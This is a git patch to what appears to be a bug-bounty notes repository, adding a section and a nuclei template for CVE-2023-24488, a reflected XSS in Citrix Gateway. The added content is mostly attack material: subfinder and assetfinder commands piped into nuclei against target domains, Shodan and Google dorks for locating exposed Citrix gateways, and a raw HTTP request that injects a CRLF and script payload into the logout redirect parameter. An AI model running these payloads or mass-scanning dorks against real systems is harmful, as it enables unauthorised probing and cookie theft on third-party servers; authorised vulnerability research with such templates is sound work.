From aedb40ca279636a3c83c4e279283a6ae4cb1d73b Mon Sep 17 00:00:00 2001
From: Xalgord <xalgord@gmail.com>
Date: Tue, 25 Jul 2023 11:16:45 +0000
Subject: [PATCH] GITBOOK-51: change request with no subject merged in GitBook

---
 README.md                                  | 15 ++++++++
 SUMMARY.md                                 |  1 +
 xss-nuclei-template-cve-2023-24488.yaml.md | 45 ++++++++++++++++++++++
 3 files changed, 61 insertions(+)
 create mode 100644 xss-nuclei-template-cve-2023-24488.yaml.md

diff --git a/README.md b/README.md
index 776487e..435e121 100644
--- a/README.md
+++ b/README.md
@@ -359,6 +359,21 @@ GET /?q=xss     POST /q=xss
 <iMg src%3dN onerror%3dalert(0x000D98)>
 ```
 
+### Nuclei CVE-2023-24488 Citrix XSS - Easy Bug Bounty
+
+**Command**:\
+subfinder -d [target.com](http://target.com/) -silent | nuclei -t http/cves/2023/CVE-2023-24488.yaml\
+\
+assetfinder [target.com](http://target.com/) | nuclei -t http/cves/2023/CVE-2023-24488.yaml\
+\
+**Template**: [xss-nuclei-template-cve-2023-24488.yaml.md](xss-nuclei-template-cve-2023-24488.yaml.md "mention")\
+\
+**Shodan Dork**:\
+ssl:[target.com](http://target.com/) title:"Citrix gateway"\
+\
+**Dork**:\
+intitle:"Citrix Gateway" -site:[citrix.com](http://citrix.com/)
+
 ### Some awesome people on twitter
 
 * [@Dark\_Knight](https://twitter.com/\_Dark\_Knight\_)
diff --git a/SUMMARY.md b/SUMMARY.md
index b95f126..b0a632f 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -13,3 +13,4 @@
   * [🔎 How I hacked NASA and got 8 bugs ?](recon-strategies-by-other-hackers/how-i-hacked-nasa-and-got-8-bugs.md)
   * [🔎 Simple Recon Methodology](recon-strategies-by-other-hackers/simple-recon-methodology.md)
 * [🌀 Possible "Content-Type" Header values](possible-content-type-header-values.md)
+* [🎯 XSS nuclei template CVE-2023-24488.yaml](xss-nuclei-template-cve-2023-24488.yaml.md)
diff --git a/xss-nuclei-template-cve-2023-24488.yaml.md b/xss-nuclei-template-cve-2023-24488.yaml.md
new file mode 100644
index 0000000..dc28322
--- /dev/null
+++ b/xss-nuclei-template-cve-2023-24488.yaml.md
@@ -0,0 +1,45 @@
+# 🎯 XSS nuclei template CVE-2023-24488.yaml
+
+```yaml
+id: CVE-2023-24488
+
+info:
+  name: CVE-2023-24488
+  author: assetnote
+  severity: medium
+  description: description
+  reference:
+    - https://blog.assetnote.io/2023/06/29/citrix-xss-advisory/
+  tags: tags
+
+requests:
+  - raw:
+      - |+
+        GET /oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: NSC_TASS=/Citrix
+        Cache-Control: max-age=0
+        Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Brave";v="114"
+        Sec-Ch-Ua-Mobile: ?0
+        Sec-Ch-Ua-Platform: "Windows"
+        Upgrade-Insecure-Requests: 1
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
+        Sec-Gpc: 1
+        Accept-Language: en-GB,en
+        Sec-Fetch-Site: none
+        Sec-Fetch-Mode: navigate
+        Sec-Fetch-User: ?1
+        Sec-Fetch-Dest: document
+        Accept-Encoding: gzip, deflate
+        Connection: close
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - <script>alert(document.cookie)</script>
+      - type: status
+        status:
+          - 302
+```